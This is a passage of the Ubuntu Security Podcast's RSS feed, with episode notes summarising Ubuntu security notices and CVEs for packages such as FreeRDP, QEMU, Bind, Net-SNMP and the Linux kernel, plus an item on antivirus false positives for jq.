used with python 3.7 and hence say bionic (which uses python 3.6) is not
affected</li>
</ul>
<h3 id="usn-4480-1-openstack-keystone-vulnerabilities-05-25">[<a href="https://usn.ubuntu.com/4480-1/">USN-4480-1</a>] OpenStack Keystone vulnerabilities [05:25]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12692">CVE-2020-12692</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12690">CVE-2020-12690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12691">CVE-2020-12691</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12689">CVE-2020-12689</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incorrect handling of EC2 permissions could allow an authenticated
attacker to create EC2 credentials with elevated permissions</li>
<li>Incorrect handling of OAUTH1 roles could give an authenticated attacker
more role assignments than intended</li>
<li>Incorrect handling of EC2 signature TTL checks could allow reuse of
authorisation headers</li>
</ul>
<h3 id="usn-4471-2-net-snmp-regression-05-51">[<a href="https://usn.ubuntu.com/4471-2/">USN-4471-2</a>] Net-SNMP regression [05:51]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15862">CVE-2020-15862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15861">CVE-2020-15861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous update (<a href="https://ubuntusecuritypodcast.org/episode-87/">Episode 87</a>) caused `nsExtendCacheTime` to be not
settable as MIB attribute - instead add cacheTime feature flag to set
this</li>
</ul>
<h3 id="usn-4481-1-freerdp-vulnerabilities-06-23">[<a href="https://usn.ubuntu.com/4481-1/">USN-4481-1</a>] FreeRDP vulnerabilities [06:23]</h3>
<ul>
<li>10 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-4033">CVE-2020-4033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-4032">CVE-2020-4032</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-4031">CVE-2020-4031</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-4030">CVE-2020-4030</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15103">CVE-2020-15103</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11099">CVE-2020-11099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11098">CVE-2020-11098</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11097">CVE-2020-11097</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11096">CVE-2020-11096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11095">CVE-2020-11095</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption and handling issues -&gt; OOB reads / writes, UAF
etc -&gt; crash / RCE</li>
</ul>
<h3 id="usn-4482-1-ark-vulnerability-06-54">[<a href="https://usn.ubuntu.com/4482-1/">USN-4482-1</a>] Ark vulnerability [06:54]</h3>
<ul>
<li>1 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-24654">CVE-2020-24654</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted TAR with symlinks outside of working directory -&gt; overwrite or
creation of arbitrary files (zipslip but for tar - tarslip?)</li>
</ul>
<h3 id="usn-4483-1-linux-kernel-vulnerabilities-07-22">[<a href="https://usn.ubuntu.com/4483-1/">USN-4483-1</a>] Linux kernel vulnerabilities [07:22]</h3>
<ul>
<li>13 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12656">CVE-2020-12656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24394">CVE-2020-24394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15393">CVE-2020-15393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14356">CVE-2020-14356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13974">CVE-2020-13974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12771">CVE-2020-12771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12655">CVE-2020-12655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10781">CVE-2020-10781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10768">CVE-2020-10768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10767">CVE-2020-10767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10766">CVE-2020-10766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10757">CVE-2020-10757</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20810">CVE-2019-20810</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 kernel - focal - raspi / aws / gcp / oracle / azure / gcp etc for
bionic</li>
<li>Memory leak in USB audio and USB testing drivers, DAX mremap, Speculative
Store Bypass Disable (SSBD), Indirect Branch Predictor Barrier (IBPB) &amp;
Indirect Branch Speculation mitigation bypasses, crafted XFS metadata
DoS, cgroupv2 reference count -&gt; NULL ptr deref etc</li>
</ul>
<h3 id="usn-4484-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4484-1/">USN-4484-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14356">CVE-2020-14356</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 gke/HWE kernel</li>
<li>cgroupv2 issue</li>
</ul>
<h3 id="usn-4485-1-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/4485-1/">USN-4485-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12656">CVE-2020-12656</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24394">CVE-2020-24394</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15393">CVE-2020-15393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13974">CVE-2020-13974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12771">CVE-2020-12771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12655">CVE-2020-12655</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10781">CVE-2020-10781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10768">CVE-2020-10768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10767">CVE-2020-10767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10766">CVE-2020-10766</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10732">CVE-2020-10732</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20810">CVE-2019-20810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19947">CVE-2019-19947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20669">CVE-2018-20669</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic / xenial hwe / trusty esm azure)</li>
<li>Mostly same as above</li>
</ul>
<h3 id="usn-4486-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/4486-1/">USN-4486-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10323">CVE-2018-10323</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 (xenial / trusy esm hwe)</li>
<li>XFS metadata DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="farewell-joe-mcmanus-09-04">Farewell Joe McManus [09:04]</h3>
<ul>
<li>Thanks for being the best co-host a bloke could wish for</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E089.mp3" length="10554841" type="audio/mpeg" /><itunes:duration>10:59</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 88
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-88/</link>
          <pubDate>Thu, 27 Aug 2020 16:16:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>4c2390e1261b8aecf784f345f828c78f0d508cbca083da301b4be6a0a8388d75e149acccf35e138f5e9a573ce7c2785bd9ce5f327bc1a114530c6b140e3463de</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 88</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we talk antivirus scanners and false positives in the Ubuntu
  archive, plus we look at security updates for QEMU, Bind, Net-SNMP,
  sane-backends and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we talk antivirus scanners and false positives in the Ubuntu
  archive, plus we look at security updates for QEMU, Bind, Net-SNMP,
  sane-backends and more.
  </itunes:summary>
        <description>  This week we talk antivirus scanners and false positives in the Ubuntu
  archive, plus we look at security updates for QEMU, Bind, Net-SNMP,
  sane-backends and more.
  </description>
        <googleplay:description>  This week we talk antivirus scanners and false positives in the Ubuntu
  archive, plus we look at security updates for QEMU, Bind, Net-SNMP,
  sane-backends and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we talk antivirus scanners and false positives in the Ubuntu
archive, plus we look at security updates for QEMU, Bind, Net-SNMP,
sane-backends and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>56 unique CVEs addressed</p>
<h3 id="usn-4467-1-qemu-vulnerabilities-00-52">[<a href="https://usn.ubuntu.com/4467-1/">USN-4467-1</a>] QEMU vulnerabilities [00:52]</h3>
<ul>
<li>13 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-16092">CVE-2020-16092</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15863">CVE-2020-15863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14415">CVE-2020-14415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13800">CVE-2020-13800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13765">CVE-2020-13765</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13754">CVE-2020-13754</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13659">CVE-2020-13659</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13362">CVE-2020-13362</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13361">CVE-2020-13361</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13253">CVE-2020-13253</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12829">CVE-2020-12829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10761">CVE-2020-10761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-10756">CVE-2020-10756</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB read in SLiRP networking implementation when replying to a ICMP ping
echo request -&gt; malicious guest could leak host memory -&gt; info leak</li>
<li>Network Block Device server assertion failure able to be triggered via a
remote NBD client -&gt; DoS</li>
<li>Malicious guest could cause a OOB write / read in SM501 graphic driver on
host -&gt; crash / code exec</li>
</ul>
<h3 id="usn-4466-2-curl-vulnerability-01-58">[<a href="https://usn.ubuntu.com/4466-2/">USN-4466-2</a>] curl vulnerability [01:58]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8231">CVE-2020-8231</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-87/">Episode 87</a> - connect_only option -&gt; could connect to wrong destination
-&gt; info leak</li>
</ul>
<h3 id="usn-4468-1-usn-4468-2-bind-vulnerabilities-02-16">[<a href="https://usn.ubuntu.com/4468-1/">USN-4468-1</a>, <a href="https://usn.ubuntu.com/4468-2/">USN-4468-2</a>] Bind vulnerabilities [02:16]</h3>
<ul>
<li>5 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8624">CVE-2020-8624</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8623">CVE-2020-8623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8622">CVE-2020-8622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8621">CVE-2020-8621</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8620">CVE-2020-8620</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Assertion failures when handling:
<ul>
<li>queries for zones signed by RSA signature</li>
<li>truncated response to a TSIG-signed request</li>
<li>queries when QNAME minimazation and forward first are enabled</li>
<li>specially crafted large TCP payload on most recent versions (focal
only)</li>
</ul>
</li>
</ul>
<h3 id="usn-4471-1-net-snmp-vulnerabilities-03-10">[<a href="https://usn.ubuntu.com/4471-1/">USN-4471-1</a>] Net-SNMP vulnerabilities [03:10]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM (12.04 ESM), Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15862">CVE-2020-15862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15861">CVE-2020-15861</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would cache MIBs in a directory on the host - an attacker who has
read-write access to the SNMP service could use the NET-SNMP-EXTEND-MIB
extension to modify an existing MIB to add a command to be executed when
the MIB attribute is read, and this would be cached for future. In
general net-snmp server runs as a low privileged user, so any
command-exec is not privileged, except at startup when it runs as root
<strong>and</strong> loads the cached MIBs - these could then contain commands to change
the configuration of net-snmp to instead run as root and not drop
privileges. Then subsequent runs of net-snmp will run as root and so any
command-exec can be done as root. Fix is to both disable the EXTEND-MIB
extension by default and to not cache MIBs.</li>
</ul>
<h3 id="usn-4469-1-ghostscript-vulnerabilities-04-47">[<a href="https://usn.ubuntu.com/4469-1/">USN-4469-1</a>] Ghostscript vulnerabilities [04:47]</h3>
<ul>
<li>25 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-17538">CVE-2020-17538</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16310">CVE-2020-16310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16309">CVE-2020-16309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16308">CVE-2020-16308</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16307">CVE-2020-16307</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16306">CVE-2020-16306</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16305">CVE-2020-16305</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16304">CVE-2020-16304</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16303">CVE-2020-16303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16302">CVE-2020-16302</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16301">CVE-2020-16301</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16300">CVE-2020-16300</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16299">CVE-2020-16299</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16298">CVE-2020-16298</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16297">CVE-2020-16297</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16296">CVE-2020-16296</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16295">CVE-2020-16295</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16294">CVE-2020-16294</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16293">CVE-2020-16293</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16292">CVE-2020-16292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16291">CVE-2020-16291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16290">CVE-2020-16290</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16289">CVE-2020-16289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16288">CVE-2020-16288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-16287">CVE-2020-16287</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Fixes for various buffer overflows etc found via fuzzing with address
sanitizer enabled - crafted PDF files -&gt; crash / RCE</li>
</ul>
<h3 id="usn-4470-1-sane-backends-vulnerabilities-05-17">[<a href="https://usn.ubuntu.com/4470-1/">USN-4470-1</a>] sane-backends vulnerabilities [05:17]</h3>
<ul>
<li>8 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12867">CVE-2020-12867</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12866">CVE-2020-12866</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12865">CVE-2020-12865</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12864">CVE-2020-12864</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12863">CVE-2020-12863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12862">CVE-2020-12862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12861">CVE-2020-12861</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-6318">CVE-2017-6318</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflows when accessing network attached scanners - could
happen automatically when starting a scanning app which then scans the
local network -&gt; crash / code exec - found by GitHub security team</li>
<li><a href="https://securitylab.github.com/research/last-orders-at-the-house-of-force">https://securitylab.github.com/research/last-orders-at-the-house-of-force</a></li>
<li><a href="https://youtu.be/EGiQ-0pCcwc">https://youtu.be/EGiQ-0pCcwc</a></li>
</ul>
<h3 id="usn-4472-1-postgresql-vulnerabilities-06-25">[<a href="https://usn.ubuntu.com/4472-1/">USN-4472-1</a>] PostgreSQL vulnerabilities [06:25]</h3>
<ul>
<li>2 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-14350">CVE-2020-14350</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-14349">CVE-2020-14349</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 issues in the mishandling of the search path, allowing a remote
attacker to execute arbitrary SQL code - one when using logical
replication and the other with CREATE EXTENSION command.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="windows-defender-and-other-avs-flagging-jq-as-possibly-malicious-06-54">Windows Defender and other AVs flagging jq as possibly malicious [06:54]</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/several-av-engines-are-hating-on-usr-bin-jq-from-jq-1-6-1-false-positive-imo/18030">https://discourse.ubuntu.com/t/several-av-engines-are-hating-on-usr-bin-jq-from-jq-1-6-1-false-positive-imo/18030</a></li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/jq/+bug/1892843">https://bugs.launchpad.net/ubuntu/+source/jq/+bug/1892843</a></li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/jq/+bug/1892552">https://bugs.launchpad.net/ubuntu/+source/jq/+bug/1892552</a></li>
<li>Windows Defender flags as Trojan:Linux/CoinMiner.N!MTB whilst Trend Micro
flags as Trojan.SH.HADGLIDER.TSE - false positives, possible hash
collision?</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>sudo apt install jq
</span></span><span style="display:flex;"><span>xdg-open <span style="color:#e6db74">&#34;https://www.virustotal.com/gui/file/</span><span style="color:#66d9ef">$(</span>sha256sum /usr/bin/jq | cut -f1 -d<span style="color:#e6db74">&#39; &#39;</span><span style="color:#66d9ef">)</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E088.mp3" length="10484624" type="audio/mpeg" /><itunes:duration>10:55</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 87
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-87/</link>
          <pubDate>Fri, 21 Aug 2020 14:10:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>262336c80ff54cdb101bcf7724029f4aea578e701671e2aadb5373055d3b6e2b2e4ccacfa1ad0be2d837b00dcccb19a6ffcd8bc1f066c67e3f04989f49931396</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 87</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at the Drovorub Linux malware outed by the NSA/FBI plus
  we detail security updates for Dovecot, Apache, Salt, the Linux kernel and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at the Drovorub Linux malware outed by the NSA/FBI plus
  we detail security updates for Dovecot, Apache, Salt, the Linux kernel and
  more.
  </itunes:summary>
        <description>  This week we look at the Drovorub Linux malware outed by the NSA/FBI plus
  we detail security updates for Dovecot, Apache, Salt, the Linux kernel and
  more.
  </description>
        <googleplay:description>  This week we look at the Drovorub Linux malware outed by the NSA/FBI plus
  we detail security updates for Dovecot, Apache, Salt, the Linux kernel and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the Drovorub Linux malware outed by the NSA/FBI plus
we detail security updates for Dovecot, Apache, Salt, the Linux kernel and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>24 unique CVEs addressed</p>
<h3 id="usn-4456-1-usn-4456-2-dovecot-vulnerabilities-00-46">[<a href="https://usn.ubuntu.com/4456-1/">USN-4456-1</a>, <a href="https://usn.ubuntu.com/4456-2/">USN-4456-2</a>] Dovecot vulnerabilities [00:46]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-12674">CVE-2020-12674</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12673">CVE-2020-12673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-12100">CVE-2020-12100</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>3 DoS issues - nested MIME -&gt; resource exhaustion, Compuserve RPA auth
mechanism (rare) -&gt; zero length message -&gt; assert fail, NTLM missing
length check -&gt; buffer over read -&gt; crash</li>
</ul>
<h3 id="usn-4457-1-usn-4457-2-software-properties-vulnerability-01-39">[<a href="https://usn.ubuntu.com/4457-1/">USN-4457-1</a>, <a href="https://usn.ubuntu.com/4457-2/">USN-4457-2</a>] Software Properties vulnerability [01:39]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-15709">CVE-2020-15709</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>add-apt-repository ANSI escape sequence display from launchpad PPA
description</li>
</ul>
<h3 id="usn-4458-1-apache-http-server-vulnerabilities-02-27">[<a href="https://usn.ubuntu.com/4458-1/">USN-4458-1</a>] Apache HTTP Server vulnerabilities [02:27]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11993">CVE-2020-11993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11984">CVE-2020-11984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-9490">CVE-2020-9490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1934">CVE-2020-1934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1927">CVE-2020-1927</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>mod_rewrite could be tricked into redirecting to an unexpected URL via
newlines encoded into the request URL</li>
<li>use of uninitialized memory when proxying to a malicious FTP server -&gt;
info leak</li>
<li>2 HTTP/2 issues - improper handling of Cache-Digest headers and certain
logging statements -&gt; crash, DoS</li>
<li>buffer overflow in mod_proxy_uwsgi - crash / code exec</li>
</ul>
<h3 id="usn-4459-1-salt-vulnerabilities-03-18">[<a href="https://usn.ubuntu.com/4459-1/">USN-4459-1</a>] Salt vulnerabilities [03:18]</h3>
<ul>
<li>5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11652">CVE-2020-11652</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11651">CVE-2020-11651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17361">CVE-2019-17361</a> <!-- raw HTML omitted --></li>
